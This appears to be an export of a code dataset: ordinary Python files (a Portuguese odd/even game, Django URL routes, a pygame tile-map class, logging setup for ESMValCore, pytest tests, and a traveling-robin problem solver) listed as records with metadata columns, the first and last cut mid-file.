print(f'Deu \033[32m{s}\033[m PAR \033[33mVoce GANHOU!!!\033[m')
elif escolha == 1 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m IMPAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 0:
print(f'O computador jogou \033[36m{computador}\033[m e você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[33m{s}\033[m PAR \033[31mVoce PERDEU!!!\033[m')
break
elif escolha == 2 and s % 2 == 1:
print(f'O computador jogou \033[36m{computador}\033[me você jogou \033[35m{jogador}\033[m')
print(f'Deu \033[32m{s}\033[m IMPAR \033[33mVoce GANHOU!!!\033[m')
tot += 1
if tot <= 3 :
print(f'Você teve {tot} vitórias. \033[31mVOCÊ PODE SER MELHOR QUE ISSO TETE ME VENCER MAIS VEZES!!!\033[m')
else:
print(f'\033[33mVocê venceu {tot} PARABÉNS VOCÊ É O(a) MELHOR\033[m!!!!!!') | none | 1 | 3.425138 | 3 | |
example/urls.py | komorebitech/django-ses | 0 | 6623886 | try:
from django.conf.urls import *
except ImportError: # django < 1.4
from django.conf.urls.defaults import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'views.index', name='index'),
url(r'^send-email/$', 'views.send_email', name='send-email'),
url(r'^reporting/', include('django_ses.urls')),
url(r'^bounce/', 'django_ses.views.handle_bounce', name='handle_bounce'),
)
urlpatterns += staticfiles_urlpatterns()
| try:
from django.conf.urls import *
except ImportError: # django < 1.4
from django.conf.urls.defaults import *
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
url(r'^admin/doc/', include('django.contrib.admindocs.urls')),
url(r'^admin/', include(admin.site.urls)),
url(r'^$', 'views.index', name='index'),
url(r'^send-email/$', 'views.send_email', name='send-email'),
url(r'^reporting/', include('django_ses.urls')),
url(r'^bounce/', 'django_ses.views.handle_bounce', name='handle_bounce'),
)
urlpatterns += staticfiles_urlpatterns()
| it | 0.193785 | # django < 1.4 | 1.70112 | 2 |
casper/kernel/spexpr/explicit.h.py | marcovc/casper | 1 | 6623887 | <filename>casper/kernel/spexpr/explicit.h.py
import util
print "/* THIS FILE WAS AUTOGENERATED FROM explicit_ref.h.py */"
print "#include <casper/kernel/spexpr/expr_wrapper.h>"
print "namespace Casper {"
util.printRel(True)
print "namespace Detail {"
util.printRef(True)
util.printGoal(True)
util.printExprWrapper(True)
print "}"
print "}"
| <filename>casper/kernel/spexpr/explicit.h.py
import util
print "/* THIS FILE WAS AUTOGENERATED FROM explicit_ref.h.py */"
print "#include <casper/kernel/spexpr/expr_wrapper.h>"
print "namespace Casper {"
util.printRel(True)
print "namespace Detail {"
util.printRef(True)
util.printGoal(True)
util.printExprWrapper(True)
print "}"
print "}"
| none | 1 | 1.623408 | 2 | |
classes/mapping.py | ProjetIsn2019/Ethynd | 14 | 6623888 | # -*- coding: utf-8 -*-
"""Les maps
Objet "Tuile" qui correspond a une tuile.
Objet "Map" qui correspond a une carte de tuiles.
Auteur: <NAME> pour correspondre au modèle de carte imaginé par Anthony
"""
from constantes import constantes_tuiles as ct
from constantes import constantes_partie as cp
from constantes import constantes_collisions as cc
from classes import monstre as mstr
from classes import collision as col
import pygame as pg
class Map:
"""Créer une map
Pour créer des maps directement et facilement (Un outil)
Permets de:
- Charger une map (Avec 4 couches de tuiles)
- Afficher une map (Avec les 4 couches de tuiles)
++ Support transparence.
"""
def __init__(self, nom, camera=(0, 0), musique=None):
"""Initialise la map
Avec un nom, la position de la camera, la couleur de fond
Ajoute une hitbox pour les collisions et convertis le fichier de la map
Sous forme de matrice en 3 dimensions
1 map est composée de 4 couches, nommées respectivement 0, 1, 2, 3
Seul la couche "3" (la 4 ème) passe DEVANT le personnage.
Les couches 0 1 et 2 sont pour les collisions et les graphismes
Système de musique créé par Anthony.
"""
self.compteur = 0 # Variable du compteur d'animation initialisé à 0
x, y = camera # On extrait les coordonnées de la tuple
self.nom = nom # Définition du nom de la map
# On met -x et -y afin d'utiliser des coordonnées positives.
# En effet la map utilise un repère orthonormé standard partageant son 0 avec le repère pygame.
# Elle est donc très souvent négative.
self.x_camera = x # Camera X (position de la camera en fonction de l'axe des abcysses)
self.y_camera = y # Camera Y (position de la camera en fonction de l'ordonnée)
self.matrices = { # Dictionnaire des matrices
0: [], # Matrice qui stockera le fond
1: [], # Matrice qui stockera le milieu
2: [], # Matrice qui stockera le 1er plan
3: [] # Matrice qui stockera le plan spécial
}
self.charger_matrice() # Chargement de la matrice, du fichier carte
# Pour le nombre de colonnes et de lignes on utilise la matrice du fond
self.x = len(self.matrices[0][0]) # Variable contenant le nombre de colonnes
self.y = len(self.matrices[0]) # Variable contenant le nombre de lignes
# Variable contenant l'arrière plan de la map (pg.SCRALPHA permet de rendre la surface transparente)
self.arriere_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
# Variable contenant le premier plan de la map
self.premier_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
self.charger_hitboxs() # Charger les collisions de la map (Hitboxs)
self.charger_images() # Charger l'arrière plan et le premier plan
self.vider_monstres() # Supprimer les monstres de l'ancienne map (si il y en a)
if musique is not None: # Si une musique est donnée dans les paramètres
if cp.musique is not None: # Si une musique est jouée
cp.musique.stop() # Alors arrêter cette musique
cp.musique = pg.mixer.Sound("son/" + musique) # Récuperer la musique sous forme d'objet
cp.musique.play(loops=-1) # Jouer la musique (loops=-1 permet de la jouer en boucle indéfiniment)
def afficher_arriere_plan(self):
""" Affiche les 3 premières couches de la map
3 premières couches (0,1,2) = Arrière plan
"""
cp.ecran.blit(self.arriere_plan, (self.x_camera,
self.y_camera)) # Affiche l'arrière plan
def afficher_premier_plan(self):
""" Affiche la 4 eme couche de la map
Quatrième couche (3) = Premier plan devant le personnage
"""
cp.ecran.blit(self.premier_plan, (self.x_camera,
self.y_camera)) # Affiche le premier plan
def bouger_hitbox(self, x, y):
"""Déplace les hitboxs de collision
Permets de déplacer les hitboxs de collisions, utilisé lors du
Déplacement du personnage ou de la camera
"""
# nouvelle_liste va écraser la liste des constantes de collision pour les tuiles
for hitbox in cc.groupes["tuile"]: # Je parcours le contenu du groupe
hitbox.rect.move_ip(x, y) # Déplacer le rect.
def bouger(self, x, y):
"""Déplacer la map
Déplace:
- Les 3 couches esthétiques de tuiles
- La 4 ème couche qui passe par-dessus le personnage
"""
cp.map.x_camera += x # Bouger la camera
cp.map.y_camera += y # Bouger la camera
def actualiser(self):
"""Actualise la map
Fait les animations de tuiles.
Censé être lancé chaque tick
"""
if self.compteur < 5: # Si le compteur est inférieur à 5
self.compteur += 1 # Incrémenter le compteur
return # Quitter la fonction
for i in range(4): # Parcourir les couches de la map
for y in range(self.y): # Parcourir les tuiles en abscisse
for x in range(self.x): # Parcourir les tuiles en ordonnée
if self.matrices[i][y][x] in ct.animations: # Si la tuile a une animation correspondante
self.matrices[i][y][x] = ct.animations[self.matrices[i][y][x]] # Lui assigner l'animation correspondante
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait la tuile
if i == 3: # Si on parcours le premier plan
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else: # Sinon (implicitement, on parcours l'arrière plan)
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
self.compteur = 0
def charger_matrice(self):
"""Charger les matrices
Lire le fichier de la carte et stocker les tuiles dans une matrice
Permets de convertir un .csv en tableau/matrice.
Permets de convertir plusieurs .csv en tableaux 3D
"""
for i in range(4): # On a 4 calques, ici on parcours les calques
nom_fichier = "maps/" + self.nom + "_" + str(i) + ".csv" # Nom du fichier
# # Ex: nom_0.csv
f = open(nom_fichier, "r") # Ouvrir le fichier
for ligne in f.readlines(): # Je regarde chaque lignes
ligne = ligne.replace("\n", "") # Je supprime les \n
ligne = ligne.split(",") # On convertis la ligne en liste
if ligne != []: # Si la ligne en liste n'est pas nulle
self.matrices[i].append(ligne) # On ajoute la liste
f.close() # Fermer fichier
def charger_hitboxs(self):
""" Crée les rectangles de collisions de la map
Permets de charger les rectangles de collision de la map
(Peut génèrer des latences !)
"""
for groupe in cc.groupes: # Je parcours les groupes de collision
cc.groupes[groupe] = pg.sprite.Group() # Je les réinitialise
for i in range(3): # Je parcours les 3 premières couches de la map
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si la tuile existe
if self.matrices[i][y][x] in ct.collisions: # Si on lui a assigné des collisions
x_tuile = self.x_camera + x*32 # Position de la tuile (abscisses)
y_tuile = self.y_camera + y*32 # Position de la tuile (ordonnée)
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait l'image
mask = pg.mask.from_surface(tuile) # On fait le mask a partir de cette image
rect = pg.Rect(x_tuile, y_tuile, 32, 32) # On créé le rectangle associé a l'image
col.Hitbox("tuile", rect, mask) # Sauvegarder la liste (rect + mask)
def vider_monstres(self):
""" Supprime tout les monstres
Utilisé lors d'un changement de map
"""
cp.entites_liste = []
def charger_monstres(self):
""" Crée les monstres associés a une map
Créer des monstres d'une liste
"""
liste_monstre = []
for type_monstre in cp.niveau[self.nom]:
liste_monstre.append(type_monstre)
for type_monstre in liste_monstre:
for liste_parametre in cp.niveau[self.nom][type_monstre]:
monstre = mstr.Monstre(type_monstre, liste_parametre)
cp.entites_liste.append(monstre)
for entite in cp.entites_liste:
entite.deplacement()
entite.afficher()
def charger_images(self):
""" Charge dans la variable self.arriere_plan l'image superposée des 3 premieres couches (0, 1, 2)
Charge dans la variable self.premier_plan l'image de la dernière couche (3)
"""
for i in range(4): # Je parcours les couches
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si elle existe
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait
if i < 3: # Si on parcours les couches 2, 1 et 0
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else:
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
| # -*- coding: utf-8 -*-
"""Les maps
Objet "Tuile" qui correspond a une tuile.
Objet "Map" qui correspond a une carte de tuiles.
Auteur: <NAME> pour correspondre au modèle de carte imaginé par Anthony
"""
from constantes import constantes_tuiles as ct
from constantes import constantes_partie as cp
from constantes import constantes_collisions as cc
from classes import monstre as mstr
from classes import collision as col
import pygame as pg
class Map:
"""Créer une map
Pour créer des maps directement et facilement (Un outil)
Permets de:
- Charger une map (Avec 4 couches de tuiles)
- Afficher une map (Avec les 4 couches de tuiles)
++ Support transparence.
"""
def __init__(self, nom, camera=(0, 0), musique=None):
"""Initialise la map
Avec un nom, la position de la camera, la couleur de fond
Ajoute une hitbox pour les collisions et convertis le fichier de la map
Sous forme de matrice en 3 dimensions
1 map est composée de 4 couches, nommées respectivement 0, 1, 2, 3
Seul la couche "3" (la 4 ème) passe DEVANT le personnage.
Les couches 0 1 et 2 sont pour les collisions et les graphismes
Système de musique créé par Anthony.
"""
self.compteur = 0 # Variable du compteur d'animation initialisé à 0
x, y = camera # On extrait les coordonnées de la tuple
self.nom = nom # Définition du nom de la map
# On met -x et -y afin d'utiliser des coordonnées positives.
# En effet la map utilise un repère orthonormé standard partageant son 0 avec le repère pygame.
# Elle est donc très souvent négative.
self.x_camera = x # Camera X (position de la camera en fonction de l'axe des abcysses)
self.y_camera = y # Camera Y (position de la camera en fonction de l'ordonnée)
self.matrices = { # Dictionnaire des matrices
0: [], # Matrice qui stockera le fond
1: [], # Matrice qui stockera le milieu
2: [], # Matrice qui stockera le 1er plan
3: [] # Matrice qui stockera le plan spécial
}
self.charger_matrice() # Chargement de la matrice, du fichier carte
# Pour le nombre de colonnes et de lignes on utilise la matrice du fond
self.x = len(self.matrices[0][0]) # Variable contenant le nombre de colonnes
self.y = len(self.matrices[0]) # Variable contenant le nombre de lignes
# Variable contenant l'arrière plan de la map (pg.SCRALPHA permet de rendre la surface transparente)
self.arriere_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
# Variable contenant le premier plan de la map
self.premier_plan = pg.Surface((self.x*32, self.y*32), pg.SRCALPHA) # On crée une surface de la taille de la map
self.charger_hitboxs() # Charger les collisions de la map (Hitboxs)
self.charger_images() # Charger l'arrière plan et le premier plan
self.vider_monstres() # Supprimer les monstres de l'ancienne map (si il y en a)
if musique is not None: # Si une musique est donnée dans les paramètres
if cp.musique is not None: # Si une musique est jouée
cp.musique.stop() # Alors arrêter cette musique
cp.musique = pg.mixer.Sound("son/" + musique) # Récuperer la musique sous forme d'objet
cp.musique.play(loops=-1) # Jouer la musique (loops=-1 permet de la jouer en boucle indéfiniment)
def afficher_arriere_plan(self):
""" Affiche les 3 premières couches de la map
3 premières couches (0,1,2) = Arrière plan
"""
cp.ecran.blit(self.arriere_plan, (self.x_camera,
self.y_camera)) # Affiche l'arrière plan
def afficher_premier_plan(self):
""" Affiche la 4 eme couche de la map
Quatrième couche (3) = Premier plan devant le personnage
"""
cp.ecran.blit(self.premier_plan, (self.x_camera,
self.y_camera)) # Affiche le premier plan
def bouger_hitbox(self, x, y):
"""Déplace les hitboxs de collision
Permets de déplacer les hitboxs de collisions, utilisé lors du
Déplacement du personnage ou de la camera
"""
# nouvelle_liste va écraser la liste des constantes de collision pour les tuiles
for hitbox in cc.groupes["tuile"]: # Je parcours le contenu du groupe
hitbox.rect.move_ip(x, y) # Déplacer le rect.
def bouger(self, x, y):
"""Déplacer la map
Déplace:
- Les 3 couches esthétiques de tuiles
- La 4 ème couche qui passe par-dessus le personnage
"""
cp.map.x_camera += x # Bouger la camera
cp.map.y_camera += y # Bouger la camera
def actualiser(self):
"""Actualise la map
Fait les animations de tuiles.
Censé être lancé chaque tick
"""
if self.compteur < 5: # Si le compteur est inférieur à 5
self.compteur += 1 # Incrémenter le compteur
return # Quitter la fonction
for i in range(4): # Parcourir les couches de la map
for y in range(self.y): # Parcourir les tuiles en abscisse
for x in range(self.x): # Parcourir les tuiles en ordonnée
if self.matrices[i][y][x] in ct.animations: # Si la tuile a une animation correspondante
self.matrices[i][y][x] = ct.animations[self.matrices[i][y][x]] # Lui assigner l'animation correspondante
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait la tuile
if i == 3: # Si on parcours le premier plan
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else: # Sinon (implicitement, on parcours l'arrière plan)
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
self.compteur = 0
def charger_matrice(self):
"""Charger les matrices
Lire le fichier de la carte et stocker les tuiles dans une matrice
Permets de convertir un .csv en tableau/matrice.
Permets de convertir plusieurs .csv en tableaux 3D
"""
for i in range(4): # On a 4 calques, ici on parcours les calques
nom_fichier = "maps/" + self.nom + "_" + str(i) + ".csv" # Nom du fichier
# # Ex: nom_0.csv
f = open(nom_fichier, "r") # Ouvrir le fichier
for ligne in f.readlines(): # Je regarde chaque lignes
ligne = ligne.replace("\n", "") # Je supprime les \n
ligne = ligne.split(",") # On convertis la ligne en liste
if ligne != []: # Si la ligne en liste n'est pas nulle
self.matrices[i].append(ligne) # On ajoute la liste
f.close() # Fermer fichier
def charger_hitboxs(self):
""" Crée les rectangles de collisions de la map
Permets de charger les rectangles de collision de la map
(Peut génèrer des latences !)
"""
for groupe in cc.groupes: # Je parcours les groupes de collision
cc.groupes[groupe] = pg.sprite.Group() # Je les réinitialise
for i in range(3): # Je parcours les 3 premières couches de la map
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si la tuile existe
if self.matrices[i][y][x] in ct.collisions: # Si on lui a assigné des collisions
x_tuile = self.x_camera + x*32 # Position de la tuile (abscisses)
y_tuile = self.y_camera + y*32 # Position de la tuile (ordonnée)
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait l'image
mask = pg.mask.from_surface(tuile) # On fait le mask a partir de cette image
rect = pg.Rect(x_tuile, y_tuile, 32, 32) # On créé le rectangle associé a l'image
col.Hitbox("tuile", rect, mask) # Sauvegarder la liste (rect + mask)
def vider_monstres(self):
""" Supprime tout les monstres
Utilisé lors d'un changement de map
"""
cp.entites_liste = []
def charger_monstres(self):
""" Crée les monstres associés a une map
Créer des monstres d'une liste
"""
liste_monstre = []
for type_monstre in cp.niveau[self.nom]:
liste_monstre.append(type_monstre)
for type_monstre in liste_monstre:
for liste_parametre in cp.niveau[self.nom][type_monstre]:
monstre = mstr.Monstre(type_monstre, liste_parametre)
cp.entites_liste.append(monstre)
for entite in cp.entites_liste:
entite.deplacement()
entite.afficher()
def charger_images(self):
""" Charge dans la variable self.arriere_plan l'image superposée des 3 premieres couches (0, 1, 2)
Charge dans la variable self.premier_plan l'image de la dernière couche (3)
"""
for i in range(4): # Je parcours les couches
for y in range(self.y): # Parcours les colonnes
for x in range(self.x): # Je parcours les lignes
if self.matrices[i][y][x] in ct.tuiles: # Si elle existe
tuile = ct.tuiles[self.matrices[i][y][x]] # On extrait
if i < 3: # Si on parcours les couches 2, 1 et 0
self.arriere_plan.blit(tuile, (x*32, y*32)) # On colle les images sur l'arrière plan tuile par tuile
else:
self.premier_plan.blit(tuile, (x*32, y*32)) # On colle les images sur le premier plan tuile par tuile
| fr | 0.970525 | # -*- coding: utf-8 -*- Les maps Objet "Tuile" qui correspond a une tuile. Objet "Map" qui correspond a une carte de tuiles. Auteur: <NAME> pour correspondre au modèle de carte imaginé par Anthony Créer une map Pour créer des maps directement et facilement (Un outil) Permets de: - Charger une map (Avec 4 couches de tuiles) - Afficher une map (Avec les 4 couches de tuiles) ++ Support transparence. Initialise la map Avec un nom, la position de la camera, la couleur de fond Ajoute une hitbox pour les collisions et convertis le fichier de la map Sous forme de matrice en 3 dimensions 1 map est composée de 4 couches, nommées respectivement 0, 1, 2, 3 Seul la couche "3" (la 4 ème) passe DEVANT le personnage. Les couches 0 1 et 2 sont pour les collisions et les graphismes Système de musique créé par Anthony. # Variable du compteur d'animation initialisé à 0 # On extrait les coordonnées de la tuple # Définition du nom de la map # On met -x et -y afin d'utiliser des coordonnées positives. # En effet la map utilise un repère orthonormé standard partageant son 0 avec le repère pygame. # Elle est donc très souvent négative. # Camera X (position de la camera en fonction de l'axe des abcysses) # Camera Y (position de la camera en fonction de l'ordonnée) # Dictionnaire des matrices # Matrice qui stockera le fond # Matrice qui stockera le milieu # Matrice qui stockera le 1er plan # Matrice qui stockera le plan spécial # Chargement de la matrice, du fichier carte # Pour le nombre de colonnes et de lignes on utilise la matrice du fond # Variable contenant le nombre de colonnes # Variable contenant le nombre de lignes # Variable contenant l'arrière plan de la map (pg.SCRALPHA permet de rendre la surface transparente) # On crée une surface de la taille de la map # Variable contenant le premier plan de la map # On crée une surface de la taille de la map # Charger les collisions de la map (Hitboxs) # Charger l'arrière plan et le premier plan # Supprimer les monstres de l'ancienne map (si il y en a) # Si une musique est donnée dans les paramètres # Si une musique est jouée # Alors arrêter cette musique # Récuperer la musique sous forme d'objet # Jouer la musique (loops=-1 permet de la jouer en boucle indéfiniment) Affiche les 3 premières couches de la map 3 premières couches (0,1,2) = Arrière plan # Affiche l'arrière plan Affiche la 4 eme couche de la map Quatrième couche (3) = Premier plan devant le personnage # Affiche le premier plan Déplace les hitboxs de collision Permets de déplacer les hitboxs de collisions, utilisé lors du Déplacement du personnage ou de la camera # nouvelle_liste va écraser la liste des constantes de collision pour les tuiles # Je parcours le contenu du groupe # Déplacer le rect. Déplacer la map Déplace: - Les 3 couches esthétiques de tuiles - La 4 ème couche qui passe par-dessus le personnage # Bouger la camera # Bouger la camera Actualise la map Fait les animations de tuiles. Censé être lancé chaque tick # Si le compteur est inférieur à 5 # Incrémenter le compteur # Quitter la fonction # Parcourir les couches de la map # Parcourir les tuiles en abscisse # Parcourir les tuiles en ordonnée # Si la tuile a une animation correspondante # Lui assigner l'animation correspondante # On extrait la tuile # Si on parcours le premier plan # On colle les images sur l'arrière plan tuile par tuile # Sinon (implicitement, on parcours l'arrière plan) # On colle les images sur le premier plan tuile par tuile Charger les matrices Lire le fichier de la carte et stocker les tuiles dans une matrice Permets de convertir un .csv en tableau/matrice. Permets de convertir plusieurs .csv en tableaux 3D # On a 4 calques, ici on parcours les calques # Nom du fichier # # Ex: nom_0.csv # Ouvrir le fichier # Je regarde chaque lignes # Je supprime les \n # On convertis la ligne en liste # Si la ligne en liste n'est pas nulle # On ajoute la liste # Fermer fichier Crée les rectangles de collisions de la map Permets de charger les rectangles de collision de la map (Peut génèrer des latences !) # Je parcours les groupes de collision # Je les réinitialise # Je parcours les 3 premières couches de la map # Parcours les colonnes # Je parcours les lignes # Si la tuile existe # Si on lui a assigné des collisions # Position de la tuile (abscisses) # Position de la tuile (ordonnée) # On extrait l'image # On fait le mask a partir de cette image # On créé le rectangle associé a l'image # Sauvegarder la liste (rect + mask) Supprime tout les monstres Utilisé lors d'un changement de map Crée les monstres associés a une map Créer des monstres d'une liste Charge dans la variable self.arriere_plan l'image superposée des 3 premieres couches (0, 1, 2) Charge dans la variable self.premier_plan l'image de la dernière couche (3) # Je parcours les couches # Parcours les colonnes # Je parcours les lignes # Si elle existe # On extrait # Si on parcours les couches 2, 1 et 0 # On colle les images sur l'arrière plan tuile par tuile # On colle les images sur le premier plan tuile par tuile | 2.921702 | 3 |
scripts/check_and_create_log_file.py | ZhuoZhuoCrayon/AcousticKeyBoard-Web | 5 | 6623889 | # -*- coding: utf-8 -*-
import os
from typing import List
def check_and_create_log_file(log_file_paths: List[str]):
for log_file_path in log_file_paths:
if os.path.exists(log_file_path):
return
log_file_root = log_file_path.rsplit("/", 1)[0]
if not os.path.exists(log_file_root):
os.makedirs(log_file_root)
with open(file=log_file_path, mode="w+") as _:
pass
| # -*- coding: utf-8 -*-
import os
from typing import List
def check_and_create_log_file(log_file_paths: List[str]):
for log_file_path in log_file_paths:
if os.path.exists(log_file_path):
return
log_file_root = log_file_path.rsplit("/", 1)[0]
if not os.path.exists(log_file_root):
os.makedirs(log_file_root)
with open(file=log_file_path, mode="w+") as _:
pass
| en | 0.769321 | # -*- coding: utf-8 -*- | 2.886258 | 3 |
test/test_day_02.py | jacobogomez/adventofcode2021 | 0 | 6623890 | import pytest
from adventofcode2021 import day_02
from .utils import load_file
@pytest.fixture
def input_file():
return load_file("input/day_02.txt")
def test_day02_part_one(input_file):
part_one_answer = day_02.dive(input_file)
assert part_one_answer == 2117664
def test_day02_part_two(input_file):
part_two_answer = day_02.dive_with_aim(input_file)
assert part_two_answer == 2073416724
| import pytest
from adventofcode2021 import day_02
from .utils import load_file
@pytest.fixture
def input_file():
return load_file("input/day_02.txt")
def test_day02_part_one(input_file):
part_one_answer = day_02.dive(input_file)
assert part_one_answer == 2117664
def test_day02_part_two(input_file):
part_two_answer = day_02.dive_with_aim(input_file)
assert part_two_answer == 2073416724
| none | 1 | 2.26639 | 2 | |
esmvalcore/_config/_logging.py | markelg/ESMValCore | 26 | 6623891 | """Configure logging."""
import logging
import logging.config
import os
import time
from pathlib import Path
from typing import Union
import yaml
def _purge_file_handlers(cfg: dict) -> None:
"""Remove handlers with filename set.
This is used to remove file handlers which require an output
directory to be set.
"""
cfg['handlers'] = {
name: handler
for name, handler in cfg['handlers'].items()
if 'filename' not in handler
}
prev_root = cfg['root']['handlers']
cfg['root']['handlers'] = [
name for name in prev_root if name in cfg['handlers']
]
def _get_log_files(cfg: dict,
output_dir: Union[os.PathLike, str] = None) -> list:
"""Initialize log files for the file handlers."""
log_files = []
handlers = cfg['handlers']
for handler in handlers.values():
filename = handler.get('filename', None)
if filename:
if output_dir is None:
raise ValueError('`output_dir` must be defined')
if not os.path.isabs(filename):
handler['filename'] = os.path.join(output_dir, filename)
log_files.append(handler['filename'])
return log_files
def _update_stream_level(cfg: dict, level=None):
"""Update the log level for the stream handlers."""
handlers = cfg['handlers']
for handler in handlers.values():
if level is not None and 'stream' in handler:
if handler['stream'] in ('ext://sys.stdout', 'ext://sys.stderr'):
handler['level'] = level.upper()
def configure_logging(cfg_file: Union[os.PathLike, str] = None,
output_dir: Union[os.PathLike, str] = None,
console_log_level: str = None) -> list:
"""Configure logging.
Parameters
----------
cfg_file : str, optional
Logging config file. If `None`, defaults to `configure-logging.yml`
output_dir : str, optional
Output directory for the log files. If `None`, log only to the console.
console_log_level : str, optional
If `None`, use the default (INFO).
Returns
-------
log_files : list
Filenames that will be logged to.
"""
if cfg_file is None:
cfg_file = Path(__file__).parent / 'config-logging.yml'
cfg_file = Path(cfg_file).absolute()
with open(cfg_file) as file_handler:
cfg = yaml.safe_load(file_handler)
if output_dir is None:
_purge_file_handlers(cfg)
log_files = _get_log_files(cfg, output_dir=output_dir)
_update_stream_level(cfg, level=console_log_level)
logging.config.dictConfig(cfg)
logging.Formatter.converter = time.gmtime
logging.captureWarnings(True)
return log_files
| """Configure logging."""
import logging
import logging.config
import os
import time
from pathlib import Path
from typing import Union
import yaml
def _purge_file_handlers(cfg: dict) -> None:
"""Remove handlers with filename set.
This is used to remove file handlers which require an output
directory to be set.
"""
cfg['handlers'] = {
name: handler
for name, handler in cfg['handlers'].items()
if 'filename' not in handler
}
prev_root = cfg['root']['handlers']
cfg['root']['handlers'] = [
name for name in prev_root if name in cfg['handlers']
]
def _get_log_files(cfg: dict,
output_dir: Union[os.PathLike, str] = None) -> list:
"""Initialize log files for the file handlers."""
log_files = []
handlers = cfg['handlers']
for handler in handlers.values():
filename = handler.get('filename', None)
if filename:
if output_dir is None:
raise ValueError('`output_dir` must be defined')
if not os.path.isabs(filename):
handler['filename'] = os.path.join(output_dir, filename)
log_files.append(handler['filename'])
return log_files
def _update_stream_level(cfg: dict, level=None):
"""Update the log level for the stream handlers."""
handlers = cfg['handlers']
for handler in handlers.values():
if level is not None and 'stream' in handler:
if handler['stream'] in ('ext://sys.stdout', 'ext://sys.stderr'):
handler['level'] = level.upper()
def configure_logging(cfg_file: Union[os.PathLike, str] = None,
output_dir: Union[os.PathLike, str] = None,
console_log_level: str = None) -> list:
"""Configure logging.
Parameters
----------
cfg_file : str, optional
Logging config file. If `None`, defaults to `configure-logging.yml`
output_dir : str, optional
Output directory for the log files. If `None`, log only to the console.
console_log_level : str, optional
If `None`, use the default (INFO).
Returns
-------
log_files : list
Filenames that will be logged to.
"""
if cfg_file is None:
cfg_file = Path(__file__).parent / 'config-logging.yml'
cfg_file = Path(cfg_file).absolute()
with open(cfg_file) as file_handler:
cfg = yaml.safe_load(file_handler)
if output_dir is None:
_purge_file_handlers(cfg)
log_files = _get_log_files(cfg, output_dir=output_dir)
_update_stream_level(cfg, level=console_log_level)
logging.config.dictConfig(cfg)
logging.Formatter.converter = time.gmtime
logging.captureWarnings(True)
return log_files
| en | 0.459719 | Configure logging. Remove handlers with filename set. This is used to remove file handlers which require an output directory to be set. Initialize log files for the file handlers. Update the log level for the stream handlers. Configure logging. Parameters ---------- cfg_file : str, optional Logging config file. If `None`, defaults to `configure-logging.yml` output_dir : str, optional Output directory for the log files. If `None`, log only to the console. console_log_level : str, optional If `None`, use the default (INFO). Returns ------- log_files : list Filenames that will be logged to. | 2.719489 | 3 |
src/main.py | EmmanuellaAlbuquerque/traveling-robin-problem | 0 | 6623892 | <filename>src/main.py<gh_stars>0
from pathlib import Path
from robin_file_reader import RobinFileReader
from trp import TRP
from vnd import VND
from copy import deepcopy
import time
# file_path = Path("../instances/n5.txt").absolute()
# file_path = Path("../instances/n6.txt").absolute()
# file_path = Path("../instances/n10p4.txt").absolute()
# file_path = Path("../instances/n15p5.txt").absolute()
# file_path = Path("../instances/n29p7A.txt").absolute()
# file_path = Path("../instances/n29p8B.txt").absolute()
# file_path = Path("../instances/n40p11.txt").absolute()
# file_path = Path("../instances/n52p11.txt").absolute()
file_path = Path("../instances_apa_cup/cup1.txt").absolute()
# file_path = Path("../instances_apa_cup/cup2.txt").absolute()
# file_path = Path("../instances_apa_cup/cup3.txt").absolute()
def showSolution(solution):
for route in solution:
print(', '.join(map(str, route)), end=' ;\n')
def f(agent_list):
oF = 0
for i in agent_list:
oF += i['cost']
return oF
def getRoutesTotalCost(solution, cost_matrix):
total_cost = 0
for route in solution:
agent_cost = 0
for address in range(0, len(route) - 1):
address1 = route[address]
address2 = route[address+1]
agent_cost += int(cost_matrix[address1][address2])
total_cost += agent_cost
return total_cost
def calculateSolution(solution, cost_matrix):
total_cost = 0
for route in solution:
for i in range(0, len(route)):
if (i != 0):
origin = route[i-1]
destination = route[i]
# print(origin, destination)
total_cost += cost_matrix[origin][destination]
# print('\n')
print(total_cost)
# calculateSolution(vnd_solution, cost_matrix)
file = open(file_path, 'r')
(dimension, p, cost_matrix) = RobinFileReader(file).getResult()
start_time_trp = time.time()
# constructive algorithm solution
print('constructive algorithm solution')
trp = TRP(dimension, p, cost_matrix)
trp_solution = trp.run()
(initial_cost, trp_agent_list) = trp.calculateTotalCost()
# print(trp_agent_list)
# showSolution(trp_solution)
print('-> total cost:', f(trp_agent_list))
print('-> recalculated trp:', getRoutesTotalCost(trp_solution, cost_matrix))
print("Tempo Gasto: TRP %.2f" % (time.time() - start_time_trp), "seconds ")
print('\n')
start_time_vnd = time.time()
# variable neighbourhood descent solution
print('variable neighbourhood descent solution')
vnd = VND()
